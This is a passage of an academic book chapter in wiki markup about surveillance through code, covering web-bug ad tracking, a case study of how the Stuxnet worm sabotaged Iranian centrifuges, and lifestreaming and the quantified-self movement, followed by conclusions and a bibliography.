&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although one can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
One of the newer, and perhaps indicative directions of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims to keep 'an eye on 1091622 websites': an Iranian web tracking and data analytics website it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have been working on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, 417, manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. This [Eds: what does 'this' here refer to? Can it be clarified so this sentences reads better] was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Lastly, I want to turn to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the, &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as “self-tracking”, “body hacking” or “self-quantifying”. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband], for example, has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and &amp;quot;compress&amp;quot; large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions. The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- &amp;quot;Geraldine posted a photo to her album&amp;quot; or &amp;quot;John shared a video&amp;quot;. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &lt;br /&gt;
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational care of the self, facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself. Data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand software ecologies such as these (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects to these systems is that humans in many cases become the vectors that both enable the data transfers carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions. However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs in many ways are life streams. Albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also nearly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the “future self” will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to, what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0,Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
